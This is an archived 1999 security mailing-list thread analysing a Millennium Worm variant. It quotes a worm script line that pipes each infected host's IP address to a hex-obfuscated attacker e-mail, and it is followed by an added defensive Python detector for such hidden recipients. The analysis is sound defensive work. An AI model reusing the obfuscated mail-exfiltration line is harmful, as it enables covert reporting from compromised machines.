Hello,

I posted two short write-ups on recent Internet worms I've seen in the wild (ADMw0rm and Millennium Worm). http://whitehats.com/worms/. From these previous posts it looks like someone has launched a variation of the Millennium Worm.

Max Vision

At 05:23 PM 9/7/1999 +0200, Adam Morrison wrote:
> > On Wed, 1 Sep 1999, Christian Koderer wrote:
> > > ./IP | mail `printf
> > > "\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
> > > logout
> > > _EOF_
> > >
> > In case no one bothered figuring this one out, this translates to
> > 'beurpat_private'
> >
> > Apparently './IP' is a program it runs to figure out which IP it should
> > get the worm files from. Did you find a similarly named file?
>
>It's a worm; it gets the worm files from the last infected machine.
>`IP' returns the address of the machine that the copy of the worm
>is running on, and is used in the `cmd' grappling hook which
>apparently gets executed on compromised remote hosts. Each time the
>worm infects a machine, it mails the IP address of that machine to
><beurpat_private>.
>
>Now, not to make any unfounded allegations, but this worm looks
>remarkably like ADMw0rm. I wonder why it restarts named when first
>infecting a host, when it appears to also utilize several other
>vulnerabilities in order to get in. Ho, hum.
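The quoted fragment hides the report address behind `printf` hex escapes on the line after the `mail` command. As an added example (not part of the original posts), the following Python sketch flags that pattern when reviewing a recovered script; the sample script and its address are constructed placeholders, and the function names are hypothetical.

```python
import re

# Constructed sample modelled on the quoted fragment. The hex string decodes
# to a placeholder address, not the one used by the worm.
SAMPLE = r'''./IP | mail `printf
"\x63\x6f\x6c\x6c\x65\x63\x74\x40\x65\x78\x61\x6d\x70\x6c\x65\x2e\x69\x6e\x76\x61\x6c\x69\x64"`
logout
echo "plain line with \x41 only"
'''

HEX_RUN = re.compile(r'(?:\\x[0-9A-Fa-f]{2}){4,}')    # 4+ consecutive \xNN escapes
EMAIL = re.compile(r'^[\w.+-]+@[\w-]+(?:\.[\w-]+)+$')  # loose address shape
MAILER = re.compile(r'\b(?:mail|mailx|sendmail)\b')    # common mail commands


def decode_run(run):
    """Turn a literal '\\x41\\x42' run into 'AB' without evaluating anything."""
    return bytes.fromhex(run.replace('\\x', '')).decode('latin-1')


def find_hidden_recipients(script, context=1):
    """Return (line_no, decoded, near_mailer) for every hex-escaped run that
    decodes to something shaped like an e-mail address.

    near_mailer is True when a mail command appears on the same line or within
    `context` lines before it, which covers a backtick substitution that is
    split across lines as in the quoted fragment.
    """
    lines = script.splitlines()
    findings = []
    for i, line in enumerate(lines):
        for match in HEX_RUN.finditer(line):
            decoded = decode_run(match.group())
            if not EMAIL.match(decoded):
                continue
            window = lines[max(0, i - context): i + 1]
            near = any(MAILER.search(w) for w in window)
            findings.append((i + 1, decoded, near))
    return findings


if __name__ == "__main__":
    for line_no, address, near in find_hidden_recipients(SAMPLE):
        print(f"line {line_no}: hex-encoded address {address!r}, mail command nearby: {near}")
```
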
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:04:34 PDT